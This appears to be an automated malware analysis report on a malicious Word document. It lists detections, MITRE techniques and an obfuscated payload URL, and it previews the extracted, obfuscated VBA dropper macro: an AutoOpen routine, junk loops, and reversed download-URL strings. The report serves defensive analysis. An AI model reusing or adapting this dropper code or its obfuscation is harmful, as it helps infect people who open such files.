MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function and de-obfuscates a URL, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6548145-0' further supports its dropper functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6548113-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6548113-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
URL de-obfuscated from VBA string literal (1 URL) info OLE_VBA_OBFUSCATED_URLA VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime — junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://kbOk+bOkshel.bOk+bOkorbOk+bOkg/wp3bOjY.UtqQ Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 165725 bytes |
SHA-256: 7ccd5752d3a72675d8d9f71b4e386e8737a7cba9b30de153f24dd7074931fb1e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "imAjbuPcfSfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub oLpAIK(poJVJ)
For BPiwX = 18775 To 55147
For nZsjjw = 92215 To MhVHW
ZPiOus = ChrB(qwTwN)
Next
QPKjQp = 22345 * 771
wUYMLU = czBzEp + RJPkQ
Next
End Sub
Sub cZhVCf(BzESK)
For nTKpih = 87048 To 29309
For TwQrb = 876 To aBEvDJ
mCKfO = ChrB(ivimI)
Next
vHUjD = 44038 * 64626
FlFKD = JXCNO + dwXmYB
Next
For ppYNdj = 48827 To 9132
For FUBYVB = 34568 To zzcJQ
sUXQY = ChrB(jhIBss)
Next
jXbbi = 366 * 47136
iMqWb = WpYZUZ + fsFSAF
Next
For YLAjd = 67295 To 71457
For VYzJro = 19750 To htzVN
kcXTjA = ChrB(VIduXt)
Next
LKsst = 87132 * 38081
bLhuVj = ZDjnj + XIKzkw
Next
End Sub
Sub QUOUvn(XAEcUY)
For BMlpfv = 95478 To 66749
For KkMvoB = 65488 To IvUjHw
whmBZ = ChrB(HTIpWw)
Next
KECBh = 88038 * 6958
jrIVSL = YDCuP + qzIwJ
Next
For DQDGSE = 17581 To 66882
For sSBNt = 55458 To qifGn
uEnbhz = ChrB(HuFXS)
Next
TflqR = 17983 * 54842
jlAhW = aHdRDn + WzSqX
Next
End Sub
Sub Autoopen()
On Error Resume Next
For OwzMd = 90142 To 86005
For kEoNz = 21477 To NSnuL
sAQnU = ChrB(lzjSzu)
Next
NTiYW = 73476 * 56799
qCpEFc = IjfvMF + vhZIQ
Next
HVnXMnsXU (MEmpT + WBFjPWH + zFiuQI)
For RCwbjP = 4240 To 91806
For zmDiur = 44594 To zNWWa
PAkIij = ChrB(mOnioT)
Next
FptNLX = 8059 * 99357
lCFicu = mLqPi + zGXLLN
Next
End Sub
Sub PDGXZ(KTIKDi)
For OzGZB = 1221 To 83722
For BTzEP = 58199 To nqzLqb
hviJj = ChrB(jiAnhS)
Next
zzwKK = 43020 * 23745
kJTKS = fRLrs + sRLrrU
Next
For bWTKX = 94325 To 33160
For nsoATP = 13816 To lOwOQE
ovodU = ChrB(oHSqPk)
Next
RzwNAd = 84628 * 47676
rYYlU = ctFqX + iPiTw
Next
For zlWJE = 59066 To 29481
For mRlNmM = 77133 To EQEjO
iZkYN = ChrB(mjOuEV)
Next
nAhTuV = 76312 * 74411
HsDLV = LRONu + GwYjRh
Next
End Sub
Sub CDrJRT(SWzKN)
For cTSsUB = 23133 To 51616
For wfqaH = 62198 To Imcou
GPimrV = ChrB(oUDzTI)
Next
ijMPVS = 57829 * 12969
SqLUO = KiYjs + CJiJq
Next
End Sub
Attribute VB_Name = "kccrHztZcaMT"
Sub FAEQvj(fZJVa)
For QacWiG = 58543 To 72713
For djbjMb = 79250 To kVFFmM
tndqBK = ChrB(HQTiT)
Next
FwGopM = 42874 * 39991
LTZqnZ = UidNdd + cokiKc
Next
End Sub
Function WBFjPWH()
On Error Resume Next
For PdHsj = 77455 To 27996
For PaqdD = 53432 To QLXuH
lFGTcE = ChrB(AFdLsi)
Next
pRwGkl = 6839 * 36135
WAZPS = ZLQUP + YBYEjk
Next
For BPQFzf = 73499 To 50552
For jShjv = 84227 To Orscf
WzhRO = ChrB(lscZhw)
Next
JCwwKD = 15098 * 93446
OzminL = HWjOfs + YfRro
Next
AwzUY = TXPWGS(",QqtU.YjOb3pw/gkOb+kObrokOb+kOb.lehskOb+kObk//:ptth@/Y37skOb+kObHem/mokOb+kO'+'bc.nosk'+'Ob+kObwkOb+kObalinikOb+kOb'+'g/kOb+kOb/kOb+kOb:ptthkOb+kOb@/K0FXK", 64014 + 2 - 64014, 64014 + 145 - 64014)
For HtAkT = 65353 To 36439
For shYXa = 69097 To kfjHZE
CAkzR = ChrB(aTtMTb)
Next
VzBLFt = 43838 * 29716
IrEIjn = ikPQm + zAVQhq
Next
For zsVcLB = 82980 To 85682
For ihbkX = 21857 To RsjLtd
NjTQJ = ChrB(qBqTK)
Next
riLAiw = 70192 * 40755
nZiolT = MGZCW + Iwrlh
Next
rsjNHtbWjCu = TXPWGS("w@9DNiI4Zy(kOb+kOb&kOb+kOb;)kOb+kObCDSNCkOb+kObV ,)(YfkkOb+kObgNlzkO9", 48277 + 2 - 48277, 48277 + 62 - 48277)
For VjrIau = 38330 To 14833
For szNJI = 85304 To GobXiV
ktHGVW = ChrB(IzQuz)
Next
vREuRL = 26984 * 38709
MtOih = DJKHAr + PSnwk
Next
For HkKUh = 21079 To 21121
Fo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.